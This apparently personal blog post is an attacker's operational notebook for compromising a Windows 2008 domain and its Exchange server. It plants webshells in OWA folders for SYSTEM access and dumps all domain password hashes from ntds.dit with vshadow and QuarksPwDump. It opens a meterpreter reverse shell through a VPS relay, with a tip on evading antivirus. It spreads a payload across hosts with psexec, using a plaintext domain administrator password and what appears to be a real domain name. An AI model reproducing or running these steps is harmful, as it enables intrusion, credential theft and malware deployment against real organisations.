windows 2008 domain controllers

on under web
2 minute read

0x01 upload backup webshells

1.there exists a webshell upload by someone else:https://xx.oo.xx/owa/auth/error1.aspx
2.webshell in different folder has different privileges
    https://xx.oo.xx/aspnet_client/system_web/2_0_50727/some.aspx      C:\inetpub\wwwroot\> whoami ---> iis apppool\defaultapppool
    https://xx.oo.xx对应C:\inetpub\wwwroot\      目录下(index.html)   iis权限
    https://xx.oo.xx/owa/auth/some.aspx    C:\inetpub\wwwroot\> whoami ---> nt authority\system
    https://xx.oo.xx/owa/对应C:\Program Files\Microsoft\Exchange Server\V14\ClientAccess\Owa\ 目录 system权限
3.upload a strong webshell but found "/" error
    my way defferent from uppon one:
    create a new folder,create a web.config file with below content:
            <customErrors mode="Off"/>
    --------------------------end of content----------------
    then upon a strong webshell to my new created folder,found no more error.
4.different parse 
    C:\Program Files\Microsoft\Exchange Server\V14\ClientAccess\Owa\xxoo\xxoo\大马.aspx is ok to parse
    C:\Program Files\Microsoft\Exchange Server\V14\ClientAccess\Owa\xxoo\xxoo\一句话.aspx is not ok to parse
    C:\Program Files\Microsoft\Exchange Server\V14\ClientAccess\Owa\一句话.aspx is ok to parse
    C:\Program Files\Microsoft\Exchange Server\V14\ClientAccess\Owa\auth\一句话.aspx is ok to parse
    C:\inetpub\wwwroot\大马.aspx is not ok to parse before my "adding a new web.config" way in upon 3
    C:\inetpub\wwwroot\一句话.aspx is ok to parse,with iis pri

0x02 find domain controllers and dc administrator username & password 
    dsquery server(best)
    nslookup -type=SRV is a domain name,others should be like
    netdom query fsmo


at 23:0 /every:m,t,w,th,f,s,su "d:\1.bat"
"C:\recycler\srclog.exe" -w >> "C:\recycler\test.txt"

0x03 get all hashs in the domain controllers machine

link a:
link b:
    in link a,the script name to use shadowcopy is vsshadow.exe
    in link b,the script name to use shadowcopy is vshadow.exe
I get vshadow.exe from installing,then search vshadow.exe in the system,this is a quick link:
there are three files:shadowcopy_ntds.bat,quarkspwdump.exe(v0.2b),vshadow.exe
    upload these three files to target machine's folder,eg. c:\windows\myfolder\
    shadowcopy_ntds.bat c:\windows\ntds\ntds.dit c:\windows\myfolder\ntds.dit
    (this shadowcopy_ntds.bat is from link b,it can copy any file while the file is being used)
    esentutl /p /o ntds.dit
    QuarksPwDump.exe --dump-hash-domain -with-history -nt c:\windows\ntds\ntds.dit -o c:\windows\myfolder\log.txt
    (or quarkspwdump.exe --dump-hash-domain -hist -nt c:\windows\ntds\ntds.dit -o c:\windows\myfolder\log.txt)
    the origin commands from link a is "QuarksPwDump.exe -dhb -hist -nt ntds.dit -o log.txt",which proved wrong with my quarkspwdump.exe file

0x04 get a meterpreter reverse shell

1.found windows firewall is not open on the target,but "in/out rules exists"
2.found reverse port like 200 can not get it successfully
3.can not find why the meterpreter shell can not reverse connecting msf successfully these to get meterpreter reverse shell
    target:run reverse_shell.exe(set reverse port to 53)
    vps:lcx -listen 300 53
    local pc:msf-->set lport 300-->set rhost vps's ip
5.found 53 is ok
6.better to use shellter to supass avkiller

0x05 批量种马

1>psexec.exe @pc.txt -u ABIMAQ\Administrator -p k78m90 -c c:\recycler\putty.exe
    use exploit/windows/smb/psexec
    set EXE::Custom /root/桌面/putty.exe
    set RHOST -> use armitage to choose pc.txt(,,etc)
    [msf seems better than psexec.exe]

doamin controllers, inside network, aspx, exchange server, outlook